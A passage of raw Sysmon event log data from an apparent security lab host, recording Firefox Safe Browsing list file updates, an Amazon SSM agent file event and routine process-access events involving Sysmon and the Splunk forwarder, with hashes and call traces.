Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=E6AFD7D5FC20F70B09DD08FD55305539,SHA256=91B2689174ADF14161DB154B945751949A7E5D32AA2AB2FD975E68DB853E6EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.972{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=B0272F5CF9F56F11C856155DC5F40BE1,SHA256=74AB81A1929A8806D559A13140947F076CABA52BF882364C416EF4D8E9B155F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.956{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=48A047C30981EFAEC6B882DDDDBE5760,SHA256=67A03A952869D669A35521432E8C3CAB5F306F710867A6C987026AB4BD00B466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.956{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=1CBC53C8CEAFBF6F4999E9097AE26AAF,SHA256=2E025047929B68CC6CEEC8B188BF97F99224ADBF64000959F84813359E37B976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.956{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=2C9DC5FF43649D9FFB3AD37741973775,SHA256=2DE81691A0B38C189A7F8C9D7765B621AC0324275BF6FF615374A74E73256A2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.941{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.925{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.925{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.909{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.894{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.894{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.872{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.872{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.856{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.856{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=0DBA6F5178E8433D0EED8C5BB5223635,SHA256=262DCBF46B0C20468B29D2908412070388B9BAAF0AFED3693245F92E61E5DE00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.856{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=D65C0F2F756552800930D7EDA0264C0B,SHA256=67606ECCDB4FA978F4795C2ABC47767824C6D5AD65C3EE02E0E7445A31CF37CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.856{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.856{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.841{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=AFD5A023DF4245E323E53D47A0BF9414,SHA256=FEE63ABE7743CA680B6C96024D9EE023C10F7C9BC1929231A663A55A79EF5D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.841{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=80ED9689AB372AAC91B47B347AE5A3BD,SHA256=253E054323EF5921475DD6DFC92942944B17AD7F18FCF851C44F165687F845AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.841{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.825{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.825{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=10DF08FF9D77ACBF8F2BFB88B4BF1E3E,SHA256=4CC64D82E2EE876BA287302C877554B9D226416AF66CDF9C0350DBB845433881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.825{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=E1E560A4EAE533286AEA5189E628BBCA,SHA256=0E5F9C474D34A165AF58EFB90E76E2CEDAE8A3E4FC29A6D9B9E2CFAEACD88A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.793{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=2C9DC5FF43649D9FFB3AD37741973775,SHA256=2DE81691A0B38C189A7F8C9D7765B621AC0324275BF6FF615374A74E73256A2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.779{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.631{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=7BB120DDFF6C265E7941DC916367E2D1,SHA256=1E5688668A0D3F820F679B2E8331A5CDFF73ED890BA3F8CC2B23079BD014CD2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.622{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.602{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=E6AFD7D5FC20F70B09DD08FD55305539,SHA256=91B2689174ADF14161DB154B945751949A7E5D32AA2AB2FD975E68DB853E6EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.591{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.555{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-163MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.550{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=C525444624C9FDB989494A7FCD01A9BF,SHA256=B6B309C5AEB9748C21EBD33465C5ED072CE849F16B1E33150B089712E0B34DF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.480{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.411{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-189D-6216-4C07-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.406{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.405{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-189D-6216-4C07-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.404{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-189D-6216-4C07-000000003802}6416C:\Program 